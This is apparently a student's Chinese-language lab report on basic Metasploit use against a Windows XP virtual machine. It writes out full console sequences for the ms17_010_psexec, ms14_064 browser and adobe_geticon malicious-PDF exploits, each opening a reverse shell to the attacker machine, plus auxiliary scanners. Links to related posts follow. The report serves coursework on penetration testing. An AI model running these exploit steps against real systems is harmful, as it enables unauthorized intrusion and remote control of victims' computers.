2018-2019 20165237网络对抗 Exp5 MSF基础应用

---

实验目标

• 本实践目标是掌握metasploit的基本应用方式，重点常用的三种攻击方式的思路。具体需要完成：
• 一个主动攻击实践，如ms08-067; （1分）

ms17_010_psexec(√) 不唯一

• 一个针对浏览器的攻击，如ms11-050；（1分）

ms14_064_ole_lode_execution(√)不唯一

• 一个针对客户端的攻击，如Adobe；（1分）

adobe_geticon(√) 唯一

• 成功应用任何一个辅助模块。（0.5分）

scanner/http/ssl_version(√)不唯一

scanner/portscan/tcp (√)不唯一

scanner/oracle/tnslsnr_version (√)唯一

• 以上四个小实践可不限于以上示例，并要求至少有一个是和其他所有同学不一样的，否则扣除0.5分。

---

Exp 5.1 一个主动攻击实践-ms17-010

• 攻击机：Kali(IP地址:192.168.153.135)
• 靶机： windows XP(IP地址:192.168.153.136)

msf > use exploit/windows/smb/ms17_010_psexec

msf exploit(windows/smb/ms17_010_psexec) > show payloads

msf exploit(windows/smb/ms17_010_psexec) > set payload generic/shell_reverse_tcp //tcp反向回连

msf exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.153.135 //攻击机ip

msf exploit(windows/smb/ms17_010_psexec) > set LPORT 5237 //攻击端口

msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.153.136 //靶机ip，特定漏洞端口已经固定

msf exploit(windows/smb/ms17_010_psexec) > run //攻击

• 攻击成功如下：
  
  

---

Exp 5.2 对浏览器的攻击 ms14_064

• 攻击机：Kali(IP地址:192.168.153.135)
• 靶机： windows XP(IP地址:192.168.153.136)

msfconsole

msf > use windows/browser/ms14_064_ole_code_execution

set payload windows/meterpreter/reverse_tcp //http反向回连

set LHOST 192.168.153.135//攻击机ip

set Lport 5237//攻击端口固定

exploit //攻击

• 可以看到生成的一个URL：http://192.168.153.135:8080/YT1IHT
  
  

• 在XP的IE上点开后：
  
  

• 回到Kali，查看sessions，输入sessions -i 4后，发现攻击成功，获得shell功能
  
  

---

Exp 5.3 针对Adobe Reader软件的渗透攻击-adobe-geticon

• 攻击机：Kali(IP地址:192.168.153.135)
• 靶机： windows XP(IP地址:192.168.153.136)
  
  -依次输入以下指令：

search Adobe

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.153.135

set LPORT 5237

set filename 20165237.pdf

exploit

• 找到pdf文件（要打开显示隐藏文件选项）

• 接着输入以下代码

back

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.153.135

set LPORT 5237

exploit

• 接着在xp中点开pdf文件，回到kali，发现回传了一些东西。
  
  
  
  
  
  

• 查看sessions，输入session -i 1,发现攻击成功，可以使用shell。
  
  

---

Exp 5.4 辅助功能攻击-tcp+ssl_version+tnslsnr_version

• 攻击机：Kali(IP地址:192.168.153.135)

• 靶机： windows XP(IP地址:192.168.153.136)

• 输入search auxiliary

• 选择其中一个进行使用(其实我试了很多，成功的也挺多，但是和之前的人重复，所以我就多用了几个，可能会重复，但是我觉得效果很好)

• tcp扫描成功：
  
  
  
  

• ssl版本模块扫描成功：
  
  
  
  

• OracleSQL的监听服务攻击成功：
  
  

---

实验感想和问题

• 用自己的话解释什么是exploit,payload,encode？

exploit：针对靶机的漏洞，利用靶机中的后门，对靶机进行攻击。

payload：可以实现任何运行在受害者环境中的程序所能做的事情，并且能够执行动作包括破坏文件删除文件，向病毒的作者或者任意的接收者发送敏感信息，以及提供通向被感染计算机的后门。说白了就是传送到靶机上的用来攻击的恶意代码。

encode：对payload进行编码

• 离实战还缺些什么技术或步骤？
  
  1、在实践中发现MSF攻击的局限性很大，其中的漏洞几乎都是针对win XP系统，而实际应用的系统大部分是win7及以上的系统，如果需要实战攻击win7及以上的系统，还需要不断发现并成功利用新的漏洞。
  
  2、需要提高扫描等信息收集技术，信息收集是做攻击的重要前提，但大多数初级的扫描都会被win7及以上的系统发现甚至拒绝，所以提供相应的技术很重要。

• 感想：

这次实验花费了很多时间去查找能攻击成功的漏洞，但是让我对于msf更加熟练，甚至更加崇拜，希望以后能够使用它更多的领域。

2018-2019 20165237网络对抗 Exp5 MSF基础应用的更多相关文章

1. 2018-2019 20165221 网络对抗 Exp5 MSF基础

   2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

2. 2018-2019 20165235 网络对抗 Exp5 MSF基础

   2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

3. 2018-2019 20165220 网络对抗 Exp5 MSF基础

   实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

4. 2018-2019 20165219 网络对抗 Exp5 MSF基础

   实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

5. 20145338 《网络对抗》 MSF基础应用

   20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

6. 20145308 《网络对抗》 MSF基础应用 学习总结

   20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

7. 20145326蔡馨熤《网络对抗》——MSF基础应用

   20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

8. 20155218《网络对抗》MSF基础应用

   20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...

9. 20155304《网络对抗》MSF基础应用

   20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...

随机推荐

1. Shell采集系统cpu 内存 磁盘 网络信息

   cpu信息采集 cpu使用率 采集算法 通过/proc/stat文件采集并计算CPU总使用率或者单个核使用率.以cpu0为例,算法如下: 1. cat /proc/stat | grep ‘cpu0’ ...

2. quartz的触发器CronTriggerBean 配置

   一个Quartz的CronTrigger表达式分为七项子表达式,其中每一项以空格隔开,从左到右分别是:秒,分,时,月的某天,月,星期的某天,年:其中年不是必须的,也就是说任何一个表达式最少需要六项!  ...

3. 分享10款激发灵感的最新HTML5&sol;CSS3应用

   1.HTML5/CSS3实现iOS Path菜单 菜单动画很酷 Path菜单相信大家都不陌生吧,它在iOS中非常流行,今天我们要分享的菜单就是利用HTML5和CSS3技术来模拟实现这款iOS Path ...

4. PC-ADSL开机自动拨号方法

   方法一:把adsl拨号的快捷方式放到“开始”菜单中“所有程序”中的“启动”中. 再到“控制面板”中的“网络连接”中找到你用的拨号连接,鼠标右键点击选择“属性”.然后,在窗口上部选择“选项”,把“拨号选 ...

5. windows8 安装IIS 和 添加网站（转）

   Internet Information Services(IIS,互联网信息服务),是由微软公司提供的基于运行Microsoft Windows的互联网基本服务.最初是Windows NT版本的可选 ...

6. Qt5&period;2 android 环境搭建及其测试

   1.<安装> 软件: qt-windows-opensource-5.2.0-android-x86-win32-offline //Qt开发环境 adt-bundle-windows-x ...

7. OpenVPN GUI&colon; &quot&semi;No TAP-WIN32 adapters on this system&quot&semi;

   找到C:\Program Files\TAP-Windows\bin 管理员身份运行: deltapall.bat addtap.bat

8. &quot&semi;&lowbar;OBJC&lowbar;CLASS&lowbar;&dollar;&lowbar;MAMapServices&quot&semi;&comma; referenced from&colon; 的问题修复

   今天将高德地图集成到ios模拟器编译出现了一个错误 Undefined symbols for architecture x86_64: "_OBJC_CLASS_$_MAMapServic ...

9. shell 流程结构

   if 判断语句 if [ $a == $b ] then echo "等于" else echo "不等于" fi case分支选择 case $xs in ) ...

10. Java 语言多态性

    https://www.ibm.com/developerworks/cn/java/java-language-polymorphism/index.html 定义多态性 多态性是面向对象编程中的一 ...